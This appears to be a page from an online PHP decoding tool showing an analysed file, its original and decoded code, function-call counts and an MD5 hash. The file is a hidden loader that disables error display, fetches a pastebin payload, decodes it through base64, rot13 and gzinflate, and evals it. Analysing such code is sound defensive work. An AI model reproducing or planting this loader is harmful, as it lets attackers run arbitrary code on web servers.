Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @ini_set('output_buffering',0); @ini_set('display_errors', 0); $pasirmerah= file..

Decoded Output download

<?php  
@ini_set('output_buffering',0); 
@ini_set('display_errors', 0); 
$pasirmerah= file_get_contents('http://pastebin.com/raw.php?i=E7X5AT9X'); 
eval(str_rot13(gzinflate(str_rot13(base64_decode(($pasirmerah)))))); 
?> 

Did this file decode correctly?

Original Code

<?php 
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$pasirmerah= file_get_contents('http://pastebin.com/raw.php?i=E7X5AT9X');
eval(str_rot13(gzinflate(str_rot13(base64_decode(($pasirmerah))))));
?>

Function Calls

ini_set 2
gzinflate 1
str_rot13 1
base64_decode 1
file_get_contents 1

Variables

$pasirmerah

Stats

MD5 1a49b57db9a1e8f93df8de30686dff8c
Eval Count 0
Decode Time 105 ms